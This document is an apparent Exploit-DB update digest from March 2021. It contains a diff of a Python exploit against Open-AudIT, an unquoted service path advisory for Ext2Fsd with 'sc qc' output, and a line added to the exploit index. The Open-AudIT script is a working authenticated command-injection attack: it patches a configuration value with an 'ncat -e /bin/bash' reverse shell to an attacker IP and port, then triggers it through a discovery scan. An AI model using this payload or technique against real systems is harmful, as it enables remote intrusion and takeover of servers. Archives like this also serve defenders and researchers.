DB: 2021-03-25

2 changes to exploits/shellcodes

Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path

exploits/php/webapps/48393.py

@@ -16,44 +16,40 @@ import string
 from bs4 import BeautifulSoup
 from urllib.parse import quote
 
-warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
 
 
-if len(sys.argv) !=3D 6:
+if len(sys.argv) != 6:
-    print("[~] Usage : ./openaudit-exploit.py url username password ip port=
+    print("[~] Usage : ./openaudit-exploit.py url username password ip port")
-")
     exit()
 
-url =3D sys.argv[1]
+url = sys.argv[1]
-username =3D sys.argv[2]
+username = sys.argv[2]
-password =3D sys.argv[3]
+password = sys.argv[3]
-ip =3D sys.argv[4]
+ip = sys.argv[4]
-port =3D sys.argv[5]
+port = sys.argv[5]
 
-request =3D requests.session()
+request = requests.session()
 
 def inject_payload():
-    configuration_path =3D url+"/en/omk/open-audit/configuration/90"
+    configuration_path = url+"/en/omk/open-audit/configuration/90"
-    data =3D 'data=3D{"data":{"id":"90","type":"configuration","attributes"=
+    data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
-:{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, =
-port)
     request.patch(configuration_path, data)
     print("[+] Payload injected in settings")
 
 
 def start_discovery():
-    discovery_path =3D url+"/en/omk/open-audit/discoveries/create"
+    discovery_path = url+"/en/omk/open-audit/discoveries/create"
-    post_discovery_path =3D url+"/en/omk/open-audit/discoveries"
+    post_discovery_path = url+"/en/omk/open-audit/discoveries"
-    scan_name =3D "".join([random.choice(string.ascii_uppercase) for i in r=
+    scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
-ange(10)])
+    req = request.get(discovery_path)
-    req =3D request.get(discovery_path)
 
-    response =3D req.text
+    response = req.text
-    soup =3D BeautifulSoup(response, "html5lib")
+    soup = BeautifulSoup(response, "html5lib")
-    token =3D soup.findAll('input')[5].get("value")
+    token = soup.findAll('input')[5].get("value")
-    buttons =3D soup.findAll("button")
+    buttons = soup.findAll("button")
-    headers =3D {"Referer" : discovery_path}
+    headers = {"Referer" : discovery_path}
-    request_data =3D {
+    request_data = {
     "data[attributes][name]":scan_name,
     "data[attributes][other][subnet]":"10.10.10.1/24",
     "data[attributes][other][ad_server]":"",
@@ -101,23 +97,21 @@ ange(10)])
 
     }
     print("[+] Creating discovery ..")
-    req =3D request.post(post_discovery_path, data=3Drequest_data, headers=
+    req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
-=3Dheaders, allow_redirects=3DFalse)
+    disocvery_url = url + req.headers['Location'] + "/execute"
-    disocvery_url =3D url + req.headers['Location'] + "/execute"
     print("[+] Triggering payload ..")
     print("[+] Check your nc ;)")
     request.get(disocvery_url)
 
 
 def login():
-    login_info =3D {
+    login_info = {
     "redirect_url": "/en/omk/open-audit",
     "username": username,
     "password": password
     }
-    login_request =3D request.post(url+"/en/omk/open-audit/login", login_in=
+    login_request = request.post(url+"/en/omk/open-audit/login", login_info)
-fo)
+    login_text = login_request.text
-    login_text =3D login_request.text
     if "There was an error authenticating" in login_text:
         return False
     else:

exploits/windows/local/49706.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path
+# Date: 2021-1-19
+# Exploit Author: Mohammed Alshehri
+# Software Link:  https://sourceforge.net/projects/ext2fsd/files/latest/download
+# Version: 0.68
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+C:\Users\m507>sc qc Ext2Srv
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Ext2Srv
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Ext2Fsd\Ext2Srv.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Ext2 Management Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.

files_exploits.csv

@@ -11308,6 +11308,7 @@ id,file,description,date,author,type,platform,port
 49702,exploits/windows/local/49702.txt,"ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
 49703,exploits/windows/local/49703.txt,"ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
 49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",2021-03-23,"Alan Mondragon",local,windows,
+49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139